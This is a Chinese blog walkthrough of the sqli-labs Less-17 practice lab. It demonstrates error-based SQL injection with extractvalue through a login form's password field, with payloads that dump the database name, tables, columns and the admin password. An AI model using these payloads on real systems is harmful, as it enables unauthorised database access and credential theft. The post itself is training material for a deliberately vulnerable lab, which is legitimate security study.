[网络安全]sqli-labs Less-17 解题详析

简介: [网络安全]sqli-labs Less-17 解题详析

考察报错注入

本文使用extractvalue进行注入

原理及姿势可参考[网络安全]sqli-labs Less-5 解题详析

判断注入类型

由以下回显可知,注入类型为单引号注入


查库名

账号输入admin

密码输入:

1' and (extractvalue(1,concat(0x5c,database(),0x5c)))# 

库名为security


查表名

账号输入admin

密码输入:

1' and (extractvalue(1,concat(0x5c,(select group_concat(table_name) from information_schema.tables where table_schema=database()),0x5c)))# 

回显四个表


查列名

账号输入admin

密码输入:

1' and (extractvalue(1,concat(0x5c,(select group_concat(column_name) from information_schema.columns where table_schema=database() and table_name='users'),0x5c)))# 

得到三个列


查数据

账号输入admin

密码输入:

1' and (extractvalue(1,concat(0x5c,(select password from (select password from users where username='admin1') b) ,0x5c)))#  


总结

以上为[网络安全]sqli-labs Less-17 解题详析,后续将分享[网络安全]sqli-labs Less-18 解题详析.

我是秋说,我们下次见。

目录
相关文章
|
22天前
|
网络协议 Unix Linux
【网络安全 | 信息收集】操作系统判定及端口扫描(全网最详析)
【网络安全 | 信息收集】操作系统判定及端口扫描(全网最详析)
35 0
|
22天前
|
安全 网络协议 网络安全
【网络安全 | 渗透工具/信息收集/域名爆破】SubDomainsBrute安装及使用详析
【网络安全 | 渗透工具/信息收集/域名爆破】SubDomainsBrute安装及使用详析
21 0
|
22天前
|
网络安全
【网络安全 | 渗透工具/信息收集/域名爆破】Layer子域名挖掘机安装及使用详析
【网络安全 | 渗透工具/信息收集/域名爆破】Layer子域名挖掘机安装及使用详析
61 0
|
22天前
|
Oracle 关系型数据库 MySQL
【网络安全 | 渗透工具】Hydra工具安装、使用详析
【网络安全 | 渗透工具】Hydra工具安装、使用详析
25 0
|
22天前
|
网络安全 数据安全/隐私保护
【网络安全 | 靶场搭建】基于Kali的FTP搭建流程及FileZilla连接、报错详析
【网络安全 | 靶场搭建】基于Kali的FTP搭建流程及FileZilla连接、报错详析
18 0
|
22天前
|
安全 Java 网络安全
【网络安全 | 扫描器】御剑安装及使用教程详析
【网络安全 | 扫描器】御剑安装及使用教程详析
23 0
|
22天前
|
Web App开发 算法 网络安全
【网络安全 | Misc】解码工具Koczkatamas及CyberChef安装及使用详析
【网络安全 | Misc】解码工具Koczkatamas及CyberChef安装及使用详析
27 0
|
22天前
|
存储 安全 生物认证
【网络安全 | 指纹识别工具】WhatWeb使用详析
【网络安全 | 指纹识别工具】WhatWeb使用详析
10 0
【网络安全 | 指纹识别工具】WhatWeb使用详析
|
22天前
|
网络安全 虚拟化
【网络安全 | 工具】Kali虚拟机安装教程及报错详析
【网络安全 | 工具】Kali虚拟机安装教程及报错详析
31 0
【网络安全 | 工具】Kali虚拟机安装教程及报错详析
|
22天前
|
前端开发 安全 JavaScript
【网络安全 | 网安工具】御剑WEB指纹识别系统使用详析
【网络安全 | 网安工具】御剑WEB指纹识别系统使用详析
15 0

热门文章

最新文章